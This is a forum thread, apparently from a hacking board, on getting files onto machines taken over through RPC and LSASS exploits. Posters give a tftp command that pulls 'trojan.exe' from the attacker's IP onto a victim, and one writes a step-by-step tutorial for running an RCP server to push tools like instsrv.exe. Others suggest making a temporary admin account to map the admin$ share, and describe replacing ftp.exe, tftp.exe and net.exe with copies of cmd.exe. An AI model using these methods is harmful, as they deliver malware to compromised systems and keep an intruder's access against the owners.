Is it possible to use RCP for Transfer how ftp ? cause i was searching a lot in google and in Windows Help dir *g* but the preferences i dont understand ... so maybe someone can say me how i can use rcp

thx

Do you mean gettings files from ftp on a rpc vul box? if you are..
Get a tftp server install and share your trojan server or w/e you want the victim to download then simply run the tftp goto your rpc vic in command prompt type
"tftp -i YOURIP GET trojan.exe without quotes replace YOURIP and trojan.exe and hit enter and it should get trojan.exe from your computer

Ok this is a great solution because sometimes the ftp.Exe and tftp.exe are just renamed cmd.Exe's
now i gonna try to explain how to do in my best English



1) Download QVTNET32 from Here

2) Extract it to a directory like c:\RCP or something you like. This is your homedir and there we put the files in later.

3) Now in your extracted dir you have a file named QVTNET32.EXE double click on it and go to Services >> Servers
and set the option RCP Sever to on. In the frame with test Password File. You set rcpass.txt and press ok

4) Now open the file Passwd.exe with cmd.exe (dos) . The file is also in your extracted dir. Then you see something like this.:


WinQVT/Net Password File Utility

Usage: passwd <filename>
So then you type:
passwd rcpass.txt



5) Now you see this :

WinQVT/Net Password File Utility

New file.

Usernames:


Enter Option (C[number]=Change, A=Add, D[number]=Delete, E=Exit):

now we do these steps :
------------------------
Add User: SomeUser
Username: SomeUser
Password:
Verify:
Usernames:
1. SomeUser



6) Ok almost finished. Put all files you want to transfer into your rcp dir. Now thats it.

7) Now you want to know the transfer part i think
rcp -b YOURIP.SomeUser:File.exe File.exe
For example my ip is 80.200.0.1 and i want to transfer the file named instsrv.exe then the command = :
rcp -b 80.200.0.1.SomeUser:instsrv.exe instsrv.exe
now just w8 one sec and the File will be on the Machine


So thats it ... Sorry if my English is not so good. And i hope i wrote a easy to understand tut for you.
and if you have Questions you can always PM me


Greetz TaScam

Lol, that' s a explosive trick thanks to you c°h°, lol, very very good i didn't know that trick , anyone will have to rename a .exe more on their box, thanks...

yes sometimes they do this.

copy cmd.exe ftp.exe /y
copy cmd.exe tftp.exe /y
copy cmd.Exe net.exe
the net part you do after you started your ftp server like net start blablabla
then they can not do the net start command anymore. And you can always put the file net.exe back with rcp now

tnx alot for the rcp tut.
its usfull when ftp dont work and tftp 2

l0l,

well I dont know if you tested it but my provider disabled the rcp port.

and I thought allmost all other providers on this planet did the same thing..

So, for me [and many others]... its useless transfermethod

but on some Servers it works...

I was wondering if there is alos a cmd prompt based RCP server, i tried looking on google but i didnt had any luck.

I only found how to set it up in Linux. with RSH but that no good

I just tested under a sql shell and it works well!

as long as port 139 or 445 are opened use xcopy to copy the files to the harddisk. or map the remote admin$ share.
all you need to do is make yourself an temporary admin account.
map the admin$ share to your Z drive and drag-n-drop the files over.
Done
works for all of your lsass shells if this is why you asked

Correction about the above QVTNET32 tut:

You don't have to add a new user! After rcp server starts, anyone can get any files
on your system without auth!

e.g.

rcp -b 12.34.56.78.a:c:\boot.ini boot.ini

Just shutdown your rcp server after victim d/l the files asap.